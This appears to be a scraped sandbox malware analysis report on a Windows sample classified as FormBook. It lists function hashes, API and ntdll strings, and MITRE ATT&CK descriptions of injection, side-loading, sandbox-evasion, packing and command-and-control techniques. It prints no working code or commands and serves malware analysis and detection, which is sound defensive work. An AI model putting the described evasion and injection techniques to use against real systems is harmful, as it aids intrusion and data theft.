Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
Instruction ID: e5711c659a521541810a2666d7e3041fb5415be0afd54516fa450c9983769002
Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
Instruction Fuzzy Hash: 2CE06D72210204ABDB68DB58CD09FA673ACFB40720F140658B126975E0DAB0AE40CA65

Function 055C25E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a7ead7d35a7383d6c24c2b2a577bd36611b70dcad6a0628be414a008f638ee46
Instruction ID: 8288f52279c7f3bced89b04847b0e28e208d18d58d683df7e55df852fdde74d5
Opcode Fuzzy Hash: a7ead7d35a7383d6c24c2b2a577bd36611b70dcad6a0628be414a008f638ee46
Instruction Fuzzy Hash: 17E092322106549BC721FB69DD19F8B7B9AFF90364F114519F155571A0CB34A850C798

Function 055BB562 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
Instruction ID: aafbf8df6e74bfb2a7f9c110e506e008feeb36cdf56c3dd1cddb2b5cc7ccbdf4
Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
Instruction Fuzzy Hash: E4D05E32261661AFD7326F15EE0DF827AB5BFC0B20F050528B102264F096E1EE84C6A2

Function 055FE59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: 6a83fc2b500d29e0d385aa7e447cc7f513e07ba90f049b2fe5356b51d96167b3
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: 9FD0C933664A64ABD772AA1CFC04FD373E9BB88761F160859B019C7560C7A5AC81CA94

Function 055FC700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 1fcbc8821cafe8f8576c6317d2c91f01fb7cc2a7f70f57ef45dfc048d2c75a67
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 02C012332A0648AFC722EB98CD01F02BBA9EB98B40F110421F2048B670C631E820EA94

Function 055E340D Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
Instruction ID: 9bd46cd1fff5b3f04a820927051c8707e75b3468cbdb4e772008e14516e88315
Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
Instruction Fuzzy Hash: 0FC08C712515856AEB2F9740C908F3C3650BF00606F96299CAA412A4A1C368A8028228

Function 055C0750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 1a822902966b3aba3380affbc2c669ddee9db22af98194ac7e05440855f6d7c1
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: C5C04C797015428FCF15DB2DD694F5577E4F744740F151890EC05CBB21E624EC01CA11

Function 056035C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256bce879748dbcafb0244a3a87e7f48c22e6784d807dfdb919044a2e7e7a1dc
Instruction ID: f1d7e2aa652b76b92fed99cccdcf34435535d124746118fa793d9c76bbf7184c
Opcode Fuzzy Hash: 256bce879748dbcafb0244a3a87e7f48c22e6784d807dfdb919044a2e7e7a1dc
Instruction Fuzzy Hash: A590023264550403D10075584554716201587D1201FA9C411A4424768E8B958A51A6A6

Function 05604650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49498c6d87fbc8e65d28f35429ccc9938c6f1b584169886db7a0d6d93228bf87
Instruction ID: 8ef0f7ac13ab47cbfd38dc21a5446d3a271e58cc7fbeeffd9393107514f73d88
Opcode Fuzzy Hash: 49498c6d87fbc8e65d28f35429ccc9938c6f1b584169886db7a0d6d93228bf87
Instruction Fuzzy Hash: 6190026264150043414075584844416701597E23013D9C115A4554760D8B188955D36D

Function 055F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05634725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05634742
Execute=1, xrefs: 05634713
ExecuteOptions, xrefs: 056346A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 056346FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05634655
CLIENT(ntdll): Processing section info %ws..., xrefs: 05634787

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: ef6ce914d75ffcf1bfe8b40fb9cf920310f9062c08fd0138ae7a7c7076012445
Instruction ID: 8cdbabe19fa0272a639ed53c2a26d8afca693748d1cd54d8580fdb8a21882dff
Opcode Fuzzy Hash: ef6ce914d75ffcf1bfe8b40fb9cf920310f9062c08fd0138ae7a7c7076012445
Instruction Fuzzy Hash: 6451D831710219BAEF20EBA4DC9AFAE77A9FF4C305F0404A9E606A71D1DB709A45CF54

Function 0560B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0560B6BF

Strings

-, xrefs: 0560B650
+, xrefs: 0560B65A
0, xrefs: 0560B695
0, xrefs: 0560B66F

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 87b99691631b0b4ac84faa16c3e087ac53b7d2a9969a2e3d5e850c1392e62507
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 0681AF30E592499ADF2CCE68C8517BFBBB2BF45310F18E559D8A2A77F0C6348881CB54

Function 055FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0563728C

Strings

RTL: Re-Waiting, xrefs: 056372C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05637294
RTL: Resource at %p, xrefs: 056372A3

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 5f029258386d5398d6d39b8b437b3da49b75c36ac18d74437aa6b4a31974b844
Instruction ID: acdb16a900367122f329f31cb1461a2f1f8d86040843f694318a0438b5ef806f
Opcode Fuzzy Hash: 5f029258386d5398d6d39b8b437b3da49b75c36ac18d74437aa6b4a31974b844
Instruction Fuzzy Hash: 95410271704606ABC721CE24CC46F6AB7A6FF48720F100619F955AB740EB31E942CBD5

Function 055C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 055C9191
@, xrefs: 055C9175

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 01768d915172363db07d3966b4dd8704be6a6bb2f93a100ad911fbe0dfd28e42
Instruction ID: 78e84918c0d19846fe97fe433ca1c0b299a9eda0b540f6efc797cf724017ec50
Opcode Fuzzy Hash: 01768d915172363db07d3966b4dd8704be6a6bb2f93a100ad911fbe0dfd28e42
Instruction Fuzzy Hash: 15813C76D106699BDB35CB94CC55BEEBBB9BB48710F0081DAE90AB7640D7305E81CFA0

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Iifpj4i2kC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Iifpj4i2kC.exe

Function 00007FF67FA51460 Relevance: 10.6, APIs: 7, Instructions: 120
COMMON

Function 00007FF67FA59340 Relevance: 2.7, Strings: 2, Instructions: 238
COMMON

Function 00007FF67FA6C9B6 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 393
COMMON

Function 00007FF67FA51010 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103
COMMON

Function 00007FF67FA4B820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90
memoryCOMMON

Function 00007FF67FA44740 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108
COMMON

Function 00007FF67FA454E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
sleepCOMMON

Function 00007FF67FA4BA80 Relevance: 6.0, APIs: 4, Instructions: 26
threadCOMMON

Function 00007FF67FA50E30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Function 00007FF67FA82320 Relevance: 5.1, APIs: 4, Instructions: 83
COMMON